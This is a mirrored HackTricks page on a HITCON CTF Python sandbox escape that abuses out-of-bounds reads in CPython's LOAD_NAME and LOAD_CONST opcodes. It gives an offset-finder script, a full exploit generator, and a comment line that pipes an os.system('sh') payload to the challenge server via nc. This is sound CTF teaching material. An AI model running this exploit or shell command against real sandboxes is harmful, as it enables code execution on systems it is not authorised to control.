mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-22 11:03:24 +00:00
# LOAD\_NAME / LOAD\_CONST opcode OOB Read

<details>

<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

**This info was taken** [**from this writeup**](https://blog.splitline.tw/hitcon-ctf-2022/)**.**

### TL;DR <a href="#tldr-2" id="tldr-2"></a>

We can use the OOB read "feature" of the LOAD\_NAME / LOAD\_CONST opcodes to grab symbols that happen to be in memory. That means using a trick like `(a, b, c, ... hundreds of symbols ..., __getattribute__) if [] else [].__getattribute__(...)` to get the symbol (such as a function name) you want.

Then just craft your exploit.

### Overview <a href="#overview-1" id="overview-1"></a>

The source code is pretty short: it contains only 4 lines!

```python
source = input('>>> ')
if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
print(eval(code, {'__builtins__': {}}))
```

You can input arbitrary Python code, and it will be compiled to a [Python code object](https://docs.python.org/3/c-api/code.html). However, the `co_consts` and `co_names` of that code object are replaced with empty tuples before the code object is passed to `eval`.

As a result, any expression that contains constants (e.g. numbers, strings) or names (e.g. variables, functions) may end in a segmentation fault.

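To make the effect of that `replace` call concrete, here is a minimal sketch that builds the stripped code object and only inspects it. The input `[a, b, c]` and the `<demo>` filename are assumptions picked for illustration; the sketch deliberately never calls `eval` on the result.

```python
# Build the same kind of code object the challenge builds, but only inspect it.
source = "[a, b, c]"  # hypothetical input, chosen for illustration

original = compile(source, "<demo>", "eval")
stripped = original.replace(co_consts=(), co_names=())

print(original.co_names)                      # the names the bytecode expects
print(stripped.co_names)                      # now an empty tuple
print(stripped.co_code == original.co_code)   # the bytecode itself is untouched
```

The bytecode still refers to name indices 0, 1 and 2 even though the tuple it indexes is now empty, which is the mismatch the rest of this page abuses. Evaluating `stripped` outside the challenge is likely to crash the interpreter, so the sketch stops at inspection.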
### Out of Bound Read <a href="#out-of-bound-read" id="out-of-bound-read"></a>

How does the segfault happen?

Let's start with a simple example: `[a, b, c]` could compile into the following bytecode.

```
  1           0 LOAD_NAME                0 (a)
              2 LOAD_NAME                1 (b)
              4 LOAD_NAME                2 (c)
              6 BUILD_LIST               3
              8 RETURN_VALUE
```

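To check which index each `LOAD_NAME` carries on your own interpreter, the standard `dis` module can list the instructions. A small sketch follows; the `<demo>` filename and the `load_names` variable are illustrative names, and other opcodes in the listing may differ between CPython versions.

```python
import dis

code = compile("[a, b, c]", "<demo>", "eval")

# Collect (name, oparg) for every LOAD_NAME instruction in the code object.
load_names = [
    (ins.argval, ins.arg)
    for ins in dis.get_instructions(code)
    if ins.opname == "LOAD_NAME"
]
print(load_names)
```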
But what if `co_names` becomes an empty tuple? The `LOAD_NAME 2` opcode is still executed, and it tries to read a value from the memory address where the entry originally would have been. Yes, this is an out-of-bounds read "feature".

The core concept of the solution is simple. Some opcodes in CPython, for example `LOAD_NAME` and `LOAD_CONST`, are vulnerable (?) to OOB reads.

They retrieve an object at index `oparg` from the `consts` or `names` tuple (that is what `co_consts` and `co_names` are called under the hood). We can refer to the following short snippet for `LOAD_CONST` to see what CPython does when it processes the `LOAD_CONST` opcode.

```c
case TARGET(LOAD_CONST): {
    PREDICTED(LOAD_CONST);
    PyObject *value = GETITEM(consts, oparg);
    Py_INCREF(value);
    PUSH(value);
    FAST_DISPATCH();
}
```

In this way we can use the OOB feature to get a "name" from an arbitrary memory offset. To find out which name sits at which offset, just keep trying `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... You should start finding something at around oparg > 700. You can of course also use gdb to look at the memory layout, but I don't think that would be any easier.

### Generating the Exploit <a href="#generating-the-exploit" id="generating-the-exploit"></a>

Once we have those useful offsets for names / consts, how _do_ we get a name / const from that offset and use it? Here is a trick for you:\
Let's assume we can get the name `__getattribute__` from offset 5 (`LOAD_NAME 5`) with `co_names=()`; then just do the following:

```python
[a,b,c,d,e,__getattribute__] if [] else [
    [].__getattribute__
    # you can get the __getattribute__ method of list object now!
]
```

> Notice that it is not necessary to name it `__getattribute__`; you can give it a shorter or weirder name.

You can understand the reason by looking at its bytecode:

```python
        0 BUILD_LIST               0
        2 POP_JUMP_IF_FALSE       20
  >>    4 LOAD_NAME                0 (a)
  >>    6 LOAD_NAME                1 (b)
  >>    8 LOAD_NAME                2 (c)
  >>   10 LOAD_NAME                3 (d)
  >>   12 LOAD_NAME                4 (e)
  >>   14 LOAD_NAME                5 (__getattribute__)
       16 BUILD_LIST               6
       18 RETURN_VALUE
       20 BUILD_LIST               0
  >>   22 LOAD_ATTR                5 (__getattribute__)
       24 BUILD_LIST               1
       26 RETURN_VALUE
```

Notice that `LOAD_ATTR` also retrieves the name from `co_names`. Python loads a name from the same offset if the name is the same, so the second `__getattribute__` is still loaded from offset 5. Using this feature, we can use an arbitrary name as long as that name is somewhere in nearby memory.

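The name sharing described above can be checked without running anything dangerous. The sketch below compiles the same expression (written on one line) and looks only at `co_names`; the `<demo>` filename and the `slot` variable are illustrative. It inspects the tuple and not the raw `LOAD_ATTR` oparg, because on some newer CPython versions that oparg carries extra flag bits besides the index.

```python
source = "[a,b,c,d,e,__getattribute__] if [] else [[].__getattribute__]"
code = compile(source, "<demo>", "eval")

# Each distinct identifier gets exactly one slot in co_names, whether it is
# used as a variable (LOAD_NAME) or as an attribute (LOAD_ATTR).
print(code.co_names)
slot = code.co_names.index("__getattribute__")
print(slot)
```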
Generating numbers should be trivial:

* 0: not \[\[]]
* 1: not \[]
* 2: (not \[]) + (not \[])
* ...

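The number encoding in the list above can be sketched as a small helper. The name `encode_number` is hypothetical; the idea is only that `not []` is `True`, `not [[]]` is `False`, and booleans add up like integers, so no numeric constant ever has to be loaded.

```python
def encode_number(num):
    """Return an expression string that evaluates to `num` without any literal."""
    if num == 0:
        return "(not[[]])"  # [[]] is non-empty, so `not` yields False (== 0)
    # True + True + ... repeated `num` times adds up to `num`.
    return "(" + "+".join(["(not[])"] * num) + ")"


empty_env = {"__builtins__": {}}
for n in (0, 1, 2, 7):
    expr = encode_number(n)
    print(n, expr, eval(expr, empty_env))
```

The expressions grow linearly with the number, which matters under the 13337-character input limit; that is one reason to prefer small indices where possible.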
### Exploit Script <a href="#exploit-script-1" id="exploit-script-1"></a>

I didn't use consts due to the length limit.

First, here is a script to find the offsets of those names.

```python
from types import CodeType
from opcode import opmap
from sys import argv


class MockBuiltins(dict):
    # Echo back any string that gets looked up, so the name found at the
    # out-of-bounds slot becomes the result of LOAD_NAME.
    def __getitem__(self, k):
        if type(k) == str:
            return k


if __name__ == '__main__':
    n = int(argv[1])

    # Prefix with EXTENDED_ARG when the index does not fit in one byte.
    code = [
        *([opmap['EXTENDED_ARG'], n // 256]
          if n // 256 != 0 else []),
        opmap['LOAD_NAME'], n % 256,
        opmap['RETURN_VALUE'], 0
    ]

    # Positional CodeType arguments as used in the original writeup; this
    # constructor signature differs between CPython versions.
    c = CodeType(
        0, 0, 0, 0, 0, 0,
        bytes(code),
        (), (), (), '<sandbox>', '<eval>', 0, b'', ()
    )

    ret = eval(c, {'__builtins__': MockBuiltins()})
    if ret:
        print(f'{n}: {ret}')

# for i in $(seq 0 10000); do python find.py $i ; done
```

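The script above emits a single `EXTENDED_ARG` prefix, which covers indices up to 65535. As a rough sketch of how that encoding works in general, the helpers below (`encode_load_name` and `decode_oparg` are hypothetical names, not part of the writeup) split an index into bytes and rebuild it the way the interpreter accumulates it. It assumes the two-byte instruction format used since CPython 3.6 and ignores any inline cache entries.

```python
from opcode import opmap


def encode_load_name(index):
    """Encode LOAD_NAME <index> as byte values, adding EXTENDED_ARG prefixes."""
    if not 0 <= index < 2 ** 32:
        raise ValueError("oparg must fit in 32 bits")
    # Split the index into base-256 digits, most significant first.
    digits = []
    while True:
        digits.append(index % 256)
        index //= 256
        if index == 0:
            break
    digits.reverse()
    out = []
    for high in digits[:-1]:
        out += [opmap["EXTENDED_ARG"], high]
    out += [opmap["LOAD_NAME"], digits[-1]]
    return out


def decode_oparg(code_bytes):
    """Rebuild the full oparg: each EXTENDED_ARG shifts the value left by 8 bits."""
    arg = 0
    for op, low in zip(code_bytes[0::2], code_bytes[1::2]):
        arg = (arg << 8) | low
        if op != opmap["EXTENDED_ARG"]:
            return arg
    raise ValueError("no real opcode after EXTENDED_ARG prefixes")


for n in (5, 2850, 4693):
    encoded = encode_load_name(n)
    print(n, encoded, decode_oparg(encoded))
```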
And the following script generates the real Python exploit.

```python
import sys
import unicodedata


class Generator:
    # get number
    def __call__(self, num):
        if num == 0:
            return '(not[[]])'
        return '(' + ('(not[])+' * num)[:-1] + ')'

    # get string: any attribute access on the generator returns an index
    # expression into `keys` / `keys2` instead of a string literal
    def __getattribute__(self, name):
        try:
            offset = None.__dir__().index(name)
            return f'keys[{self(offset)}]'
        except ValueError:
            offset = None.__class__.__dir__(None.__class__).index(name)
            return f'keys2[{self(offset)}]'


_ = Generator()

# Filler: 4700 distinct single-character identifiers, so that the i-th
# element of the tuple expression below uses co_names slot i.
names = []
chr_code = 0
for x in range(4700):
    while True:
        chr_code += 1
        char = unicodedata.normalize('NFKC', chr(chr_code))
        if char.isidentifier() and char not in names:
            names.append(char)
            break

# Slots where a useful string was found with the offset finder
# (these values are specific to the target build).
offsets = {
    "__delitem__": 2800,
    "__getattribute__": 2850,
    '__dir__': 4693,
    '__repr__': 2128,
}

variables = ('keys', 'keys2', 'None_', 'NoneType',
             'm_repr', 'globals', 'builtins',)

for name, offset in offsets.items():
    names[offset] = name

# Our own variable names are placed at slots 792 and up.
for i, var in enumerate(variables):
    assert var not in offsets
    names[792 + i] = var


source = f'''[
({",".join(names)}) if [] else [],
None_ := [[]].__delitem__({_(0)}),
keys := None_.__dir__(),
NoneType := None_.__getattribute__({_.__class__}),
keys2 := NoneType.__dir__(NoneType),
get := NoneType.__getattribute__,
m_repr := get(
    get(get([],{_.__class__}),{_.__base__}),
    {_.__subclasses__}
)()[-{_(2)}].__repr__,
globals := get(m_repr, m_repr.__dir__()[{_(6)}]),
builtins := globals[[*globals][{_(7)}]],
builtins[[*builtins][{_(19)}]](
    builtins[[*builtins][{_(28)}]](), builtins
)
]'''.strip().replace('\n', '').replace(' ', '')

print(f"{len(source) = }", file=sys.stderr)
print(source)

# (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port
```

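The string lookup performed by `Generator.__getattribute__` in the script above can be illustrated in isolation. In this sketch `name_expr` is a hypothetical helper, and it writes the index as a plain integer for readability, whereas the real exploit encodes it with the `not[]` arithmetic. The exact positions in the two lists depend on the interpreter version, so no concrete indices are assumed here.

```python
NoneType = type(None)
keys = None.__dir__()               # attribute names visible on the None instance
keys2 = NoneType.__dir__(NoneType)  # attribute names visible on the NoneType class


def name_expr(name):
    """Return an expression that evaluates to `name` without a string literal."""
    if name in keys:
        return f"keys[{keys.index(name)}]"
    return f"keys2[{keys2.index(name)}]"


env = {"__builtins__": {}, "keys": keys, "keys2": keys2}
for wanted in ("__class__", "__base__", "__subclasses__"):
    expr = name_expr(wanted)
    print(wanted, "->", expr, "->", eval(expr, env))
```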
It basically does the following; the strings themselves are obtained from the `__dir__` method:

```python
getattr = (None).__getattribute__('__class__').__getattribute__
builtins = getattr(
    getattr(
        getattr(
            [].__getattribute__('__class__'),
            '__base__'),
        '__subclasses__'
    )()[-2],
    '__repr__').__getattribute__('__globals__')['builtins']
builtins['eval'](builtins['input']())
```
